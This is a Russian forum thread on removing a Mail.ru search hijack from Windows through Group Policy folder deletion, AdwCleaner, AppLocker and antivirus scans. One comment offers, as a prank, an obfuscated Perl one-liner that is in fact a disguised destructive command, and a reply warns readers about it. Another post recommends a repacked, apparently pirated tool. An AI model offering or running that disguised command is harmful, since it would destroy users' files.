Mail.ru поиск
Из командной строки поэтапно вводим следующие комманды:
1 - RD /S /Q "%WinDir%/System32/GroupPolicyUsers"
2 - RD /S /Q "%WinDir%/System32/GroupPolicy"
3 - gpupdate /force
RD /S /Q "%WinDir%System32GroupPolicyUsers"
RD /S /Q "%WinDir%System32GroupPolicy"
gpupdate /force
тут слешей не хватает.. ниже более точный вариант
RD /S /Q "%WinDir%/System32/GroupPolicyUsers"
RD /S /Q "%WinDir%/System32/GroupPolicy"
gpupdate /force
Да, вы правы, спасибо. Действительно, я пропустил слешы. @moderator, поправте, пожалуйста, а то я уже не могу редактировать пост.
Я так однажды свой линух починил с помощью sudo rm -rf. Когда я спросил на форуме, куда делись все файлы, мне посоветовали попробовать еще echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' сверху выполнить...
Это патч Бармина, друг мой. Если не проверять команды перед выполненем, можно запросто и втайне от себя отформатировать жесткий диск...
А вам не кажется что сносить полностью групповые политики это перебор?)) Там может быть много чего полезного включено)
Вообще исправляется это удалением одного ключа из реестра
Все, хорош тянуть интригу. Я 1.3К дней ждал! Давай, говори уже, что за ключ, и где его искать?
Каждый раз натыкаясь на посты про Mail.Ru я задаюсь вопросом:"Да как вы блядь это делаете?". Вот реально, что вы делаете на этих странных страницах рунета? Какие вы программы ставите? Как вы их ставите? Как вы от них избавляетесь, если не умеете пользоваться гуглом? Почему это тема выгла в плюс? Я в замешательстве.
Народ, уже все давно за вас придуманно и упрощено... Не примите за рекламу, но (Испанцы (вроде)) " https://toolslib.net/downloads/viewdownload/1-adwcleaner " замутили под мэйловские (и далеко не только) под это дерьмо чистильщик, ADWcleaner.
Сам процес занимает не более 30 минут на бесплатном и "встроенном в винду" ПО (реже, когда на компе поселился вирус).
1-вое что стоит сделать на таком компе, это скачать сам "adwcleaner ", с оф. сайта, и выполнить сканирование и очистку, он очистит Ваш комп. (папки, отдельные файлы, и РЕЕСТР от "вируса-эксплойта"),
2-ое, после автоматической перезагрузки после "АДВклина", если у Вас Вин7(от ентерпрайс или ультимэйт) и выше (8-10), стоит заблокировать установку такого рода "срани" стандартными средствами вышеуказанных ОС.
- Зайдите в "Панель управления" любым, удобним для Вас способом,
-Далее в "Администрирование"
-"Службы"
- найдите службу "Управление приложениями" затем нажав два раза на эту службу откроются её свойства, в режиме запуска выберите "Запускать автоматически" , затем "Запуск", и" ОК".
- По ссылке без кавычек "http://forum.ru-board.com/topic.cgi?forum=5&topic=39388" скачайте политики (для той службы что мы запустили и которая впреть запускается автоматически) для запрета установки "срани", сохраните в удобном для Вас месте скаченный *.xml файл. Там кстате есть инструкция описанная мною выше...
- Далее заходим в уже знакомую панель "Администрирование"
- "Локальная политика безопасности"
- в пункте "AppLocker" правой клавишей мыши выберите пункт "Импортировать политику", в окне обзора укажите скаченный *.xml файл, затем "ОК".
Перегрузите комп.
Почти готово...
Осталось очистить браузер от расширений ВСЕХ кроме "ADBlock"- если имеется (если нету - поисковик и магазин приложений - безплатно - устанавливаем для нужного браузера). очщаем так же поисковые системы в браузере - ВСЕ, кроме нужной (1).
После проделанных действий перегружаемся, cкачаем Dr, Web Cureit, сканируем им, после автоматической перезагрузки после удаления вирусов найдених в системе перегружаемся.
После всего этого советую скачать и установить "RegOrganaizer" (в поисковике "ex.ua regorganaizer" репак от кролика 7) и после вышеуказанніх действий выполнить все указания и предпочтения этой гениальной проги.
Для тех кто напишет в личку просьбу описать процес понагляднее - запилю длиннопост. Спасибо за внимание! =)